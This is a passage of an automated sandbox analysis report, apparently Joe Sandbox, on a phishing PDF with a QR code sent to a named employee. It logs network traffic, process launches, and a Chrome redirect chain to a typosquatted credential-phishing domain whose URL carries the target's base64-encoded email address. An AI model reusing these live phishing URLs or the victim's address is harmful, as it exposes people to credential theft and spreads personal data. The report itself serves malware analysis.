Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:47:46 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: +WKxFlpPqvVpA2lsd5/Ku1ncHjus8cF2YPw=$xFBktjAo3MOOSEH6Server: cloudflareCF-RAY: 8d9c68da997f6bf6-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:47:53 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: sI+TF4xC78AIF5PwIOGc/ONL/DNFMtKCyQY=$MqrAa3wXwSvWkF1iServer: cloudflareCF-RAY: 8d9c69083a7c4665-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:47:55 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: UDIn7ikZihOj2df+M37y3cLfmSD6GaB0OBs=$AbjgofpSYMcjNqV1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wkjr9bhACmWCdQsb5KgILKYa7Sic9lFafA3%2Fe2UarypavvCSB%2FwHZf5JuwMPHzNq7qlETp3KSmsFWTZoGmq69ocVLjMRxIjOC%2FLtsOsPb9cOg1SHZ%2BSSrL%2B4dRscMJwIrVNfU8iANNVzpjhm%2FKR6fphj4%2FmQxEE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d9c6911ef233464-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1262&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2859&recv_bytes=1187&delivery_rate=2280314&cwnd=249&unsent_bytes=0&cid=e1310f6dbd044733&ts=156&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:48:03 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: v5NaMegc6efhzg8ieQdnfe4Ay7XCT5+bBSA=$0OVYBWOkGVxjLxRSServer: cloudflareCF-RAY: 8d9c69435c5deb02-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:48:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: nGoBKTo/ctBfhLJU0DOtXrwyaQ33+bNKv8Y=$6zW6KwPgXt3p2pQdcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d9c6958e9182e63-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:49:13 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: aWAYGHZGhoVoAsemoWxajMGnBQZlMHngbGw=$6e/8QDJaxkJzy8WiServer: cloudflareCF-RAY: 8d9c6afb1f642d3b-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:49:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3BkEC3rDOUbHCOb8vJ9zUvIUIwXDLj7jyqvE8ewcIC0SRoZsPtWoVw3k3HThgIVzQXIG1uEY5cLwCetL1FOFv9dA2lG28aBhdTjI%2BHV0cf8ZhAo9KF9JkuAJ19nbg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=960&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2253&delivery_rate=3283446&cwnd=250&unsent_bytes=0&cid=2b718447d92560d2&ts=648&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8d9c6b207c5ebf72-ATLserver-timing: cfL4;desc="?proto=TCP&rtt=18064&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=1916&delivery_rate=159339&cwnd=32&unsent_bytes=0&cid=70d12aaa1e932325&ts=6406&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:49:21 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: dnCdSnfPznubLt/Vs7229qBnr3LRWITNiYo=$EyV4QQiHwuTkxufyServer: cloudflareCF-RAY: 8d9c6b2e9f600c40-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:49:25 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: W0WIPBwFo1m8Dwq4ow6Q+pnq87protz7b7s=$RZKxkFcGXAsPF2Vqcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d9c6b448d8e2d2b-DFWalt-svc: h3=":443"; ma=86400
Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_185.6.dr, chromecache_181.6.dr, chromecache_197.6.drString found in binary or memory: https://8Sq.w2agn.com/B9Z64HC_oJbkvSmVBaQzfkiG7YNd-0Po/
Source: chromecache_185.6.dr, chromecache_181.6.dr, chromecache_197.6.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit
Source: 77cd9c33-604b-4682-9a13-1e8333720fc5.tmp.4.dr, 94fd05f0-8371-44d0-9962-b7d6f865d715.tmp.4.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: chromecache_185.6.dr, chromecache_181.6.dr, chromecache_197.6.drString found in binary or memory: https://code.jquery.com/jquery-3.6.0.min.js
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49778 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.winPDF@38/91@43/11
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6892Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-28 12-47-27-937.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\renier_visser-In Employee -11384.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2252 --field-trial-handle=1568,i,8438002774993098221,9784074526197564620,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://img2.leadong-edm.com/c/kdApfqMvoKJU/QLAfUpKvNfga/qpUKqIgnAGdz/jqAKUVFYiwcH?U=https://Vokbz-iamgold.mobile-pdfqronline.com/11384/#cmVuaWVyX3Zpc3NlckBpYW1nb2xkLmNvbQ==
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2004,i,2892950466930992625,14663560579764141364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2252 --field-trial-handle=1568,i,8438002774993098221,9784074526197564620,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2004,i,2892950466930992625,14663560579764141364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: renier_visser-In Employee -11384.pdfInitial sample: PDF keyword /JS count = 0
Source: renier_visser-In Employee -11384.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: renier_visser-In Employee -11384.pdfInitial sample: PDF keyword /EmbeddedFile count = 0

Persistence and Installation Behavior

barindex
Source: PDF documentLLM: PDF document contains QR code
Source: EmailJoeBoxAI: AI detected Typosquatting in URL: URL: https://mobile-pdfqronline.com
Source: EmailJoeBoxAI: AI detected Typosquatting in URL: URL: https://vokbz-iamgold.mobile-pdfqronline.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
